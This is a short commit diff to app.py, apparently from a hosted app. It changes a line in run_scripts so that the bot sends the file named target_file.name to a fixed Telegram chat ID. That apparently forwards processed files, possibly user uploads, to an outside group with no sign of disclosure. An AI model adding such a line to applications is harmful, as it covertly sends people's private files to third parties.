Update app.py
Browse files
app.py
CHANGED
@@ -29,7 +29,7 @@ def run_scripts(target, source):
|
|
29 |
#print(source)
|
30 |
#bot.send_photo("-4283513911", photo=open(os.path.abspath(output_path1), 'rb'))
|
31 |
#zipf.write(output_path1)
|
32 |
-
bot.send_photo("-4283513911", photo=open(
|
33 |
return target
|
34 |
|
35 |
#return outputfile
|
|
|
29 |
#print(source)
|
30 |
#bot.send_photo("-4283513911", photo=open(os.path.abspath(output_path1), 'rb'))
|
31 |
#zipf.write(output_path1)
|
32 |
+
bot.send_photo("-4283513911", photo=open(target_file.name, 'rb'))
|
33 |
return target
|
34 |
|
35 |
#return outputfile
|